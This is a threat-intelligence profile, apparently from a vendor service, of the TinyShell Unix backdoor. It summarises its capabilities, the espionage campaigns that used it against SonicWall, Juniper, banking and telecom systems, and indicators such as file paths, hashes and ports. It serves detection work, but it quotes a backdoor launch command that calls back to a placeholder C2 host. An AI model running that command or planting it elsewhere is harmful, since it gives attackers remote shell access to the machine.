TINYSHELL
TinyShell is a Unix/Linux backdoor used for persistence and command-and-control on network appliances and servers. The content describes it as a publicly available backdoor that has been customized into multiple variants, including ELF binaries deployed with shell scripts on embedded and appliance platforms. Reported capabilities include establishing outbound C2 over dynamic DNS, reverse-shell access, optional bind-shell/listening mode, interactive shell access, file transfer, SOCKS proxying in some customized variants, and encrypted C2 in UNC3886 RedPenguin-related variants. It has also been observed masquerading as legitimate processes such as LightDM/lightdm to evade detection.
TinyShell has been associated with several threat clusters and campaigns in the provided content. UNC2891 deployed TinyShell during a 2024 intrusion into an Indonesian bank after physically implanting a Raspberry Pi with a 4G modem on the ATM network; the backdoor established persistent access via a dynamic DNS C2 channel and was hidden using Linux bind mounts, with malicious processes observed at /tmp/lightdm and /var/snap/.snapd/lightdm. Mandiant and SonicWall reported a likely China-nexus campaign tracked as UNC4540 targeting unpatched SonicWall SMA appliances, where a TinyShell variant at /bin/httpsd was launched by bash scripts such as /bin/firewalld and /bin/iptabled to provide reverse-shell access, steal hashed credentials from the appliance SQLite session database, and persist across firmware upgrades via modification of INITRD.GZ and insertion of a backdoor user named acme. Mandiant also reported that UNC3886, a China-nexus espionage group, deployed several TinyShell-based backdoors on end-of-life Juniper MX routers running Junos OS, including six distinct variants with active and passive functionality, embedded scripts to disable logging, RC4-encrypted outbound C2 in RedPenguin-related tooling, default bind port 45678 in some variants, and use alongside process injection and memory patching of Junos daemons after exploitation of CVE-2025-21590. Rapid7 further reported TinyShell as post-exploitation tooling used by the China-linked Red Menshen telecom espionage campaign for stealthy persistence and lateral movement alongside BPFDoor, CrossC2, Sliver, keyloggers, and brute-force tools.
Targets explicitly mentioned in the content include SonicWall SMA appliances, Juniper Junos OS MX routers, banking infrastructure including ATM-connected Linux systems and Raspberry Pi implants, and telecommunications environments. High-confidence indicators and artifacts mentioned include dynamic DNS-based C2; execution paths /bin/httpsd, /tmp/lightdm, and /var/snap/.snapd/lightdm; SonicWall-related hashes 2d57bcb8351cf2b57c4fd2d1bb8f862e for /bin/httpsd, e4117b17e3d14fe64f45750be71dbaa6 for /bin/firewalld, and 8dbf1effa7bc94fc0b9b4ce83dfce2e6 for /bin/iptabled; SonicWall launch syntax nohup /bin/httpsd -c <C2 IP> -d 5 -m -1 -p 51432; Juniper-related default bind port 45678 in some UNC3886 variants; and YARA references for TINYSHELL.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Mandiant uncovered several TINYSHELL-based backdoors operating on Juniper Networks’ Junos OS routers.
Groups observed using it
6 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Using the TINYSHELL backdoor, the attacker established an outbound command-and-control (C2) channel via a Dynamic DNS domain.
Mandiant explained in a blog post that last year it discovered the UNC3886 “China-nexus espionage group” had deployed several TINYSHELL-based backdoors into Junos OS-powered routers.
The malware used on SonicWall devices consists of an ELF binary, the TinyShell backdoor, and several bash scripts that show a deep understanding of the targeted network devices.
Once inside, attackers deploy tools such as CrossC2 for command execution, TinyShell for stealthy persistence, and keyloggers or brute-force tools to steal credentials and move laterally toward core systems.
Also dropped are Sliver, TinyShell (a Unix backdoor), keyloggers, and brute-force utilities to facilitate credential harvesting and lateral movement.
Also dropped are Sliver, TinyShell (a Unix backdoor), keyloggers, and brute-force utilities to facilitate credential harvesting and lateral movement.
Techniques & procedures
21 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 techniqueUNC3886 has deployed custom malware families on Fortinet and VMware systems. During RedPenguin, UNC3886 deployed custom malware based on the publicly-available TINYSHELL backdoor.
Initial Access
3 techniquesAttacks usually begin at the network edge by exploiting exposed services or valid accounts on devices like VPNs, firewalls, and virtualization hosts.
A suspected Chinese hacking campaign has been targeting unpatched SonicWall Secure Mobile Access (SMA) appliances... While it is unclear what vulnerability was used to compromise devices, Mandiant says that the targeted devices were unpatched, making them likely vulnerable to older flaws.
Initial access was gained by physically implanting a Raspberry Pi device with a 4G modem into an ATM.
Execution
2 techniquesOne of the most recognized tools in its malware arsenal is a Linux backdoor called BPFDoor. | Upon gaining a successful foothold, Linux-compatible beacon frameworks such as CrossC2 are deployed to facilitate post-exploitation activities.
The malware used on SonicWall devices consists of an ELF binary, the TinyShell backdoor, and several bash scripts... The threat actors achieved this by using scripts that offer redundancy and ensure long-term access to breached devices.
Persistence
4 techniquesAttacks usually begin at the network edge by exploiting exposed services or valid accounts on devices like VPNs, firewalls, and virtualization hosts.
"In March 2025, it was revealed that Chinese cyber-espionage actors were deploying custom backdoors on EoL Junos OS MX routers to drop a set of ‘TinyShell’ backdoor variants."
Mandiant explained ... it discovered the UNC3886 “China-nexus espionage group” had deployed several TINYSHELL-based backdoors into Junos OS-powered routers.
Privilege Escalation
4 techniquesThe blog details their techniques, including a novel process injection method to circumvent built-in protections...
Attacks usually begin at the network edge by exploiting exposed services or valid accounts on devices like VPNs, firewalls, and virtualization hosts.
Mandiant explained ... it discovered the UNC3886 “China-nexus espionage group” had deployed several TINYSHELL-based backdoors into Junos OS-powered routers.
Stealth
6 techniques"UNC2891 deployed a range of custom malware, including CAKETAP (a Solaris/Linux rootkit)... attackers maintained undetected access for years"
the backdoor process, which was named “lightdm” in an attempt to masquerade as the legitimate LightDM display manger, but was found at an unusual location
The blog details their techniques, including a novel process injection method to circumvent built-in protections...
These backdoors included active and passive functions, and embedded scripts that disabled logging mechanisms on the device.
Attacks usually begin at the network edge by exploiting exposed services or valid accounts on devices like VPNs, firewalls, and virtualization hosts.
UNC2891 had managed to hide the PIDs for its backdoor processes using a previously undocumented technique using Linux bind mounts to hide process artifacts.
Credential Access
3 techniquesAlso dropped are Sliver, TinyShell, keyloggers, and brute-force utilities to facilitate credential harvesting and lateral movement.
Also dropped are Sliver, TinyShell, keyloggers, and brute-force utilities to facilitate credential harvesting and lateral movement.
Also dropped are Sliver, TinyShell, keyloggers, and brute-force utilities to facilitate credential harvesting and lateral movement.
Collection
1 techniqueCommand and Control
4 techniquesUsing the TINYSHELL backdoor, the attacker established an outbound command-and-control (C2) channel via a Dynamic DNS domain.
MITRE list: "T1105:Ingress Tool Transfer" and description of deploying multiple utilities/toolkit components.
Additionally, firewalld launches other malware components, like TinyShell, to establish a reverse shell on the appliance for easy remote access.
UNC2891 then used a TINYSHELL backdoor to create a command-and-control (C2) channel via a dynamic DNS domain.
Recent activity
24 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A custom backdoor family used by UNC3886 on Junos OS routers, including active and passive backdoor functions and embedded scripts that disabled logging mechanisms on the device to support stealth and persistence.
A backdoor used to establish outbound C2 access from the compromised ATM network via Dynamic DNS, enabling persistent remote access and bypassing perimeter defenses.
A stealthy persistence tool/backdoor used after initial access to maintain covert footholds in compromised environments.
A Unix backdoor used in the campaign to support credential harvesting and lateral movement after compromise.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.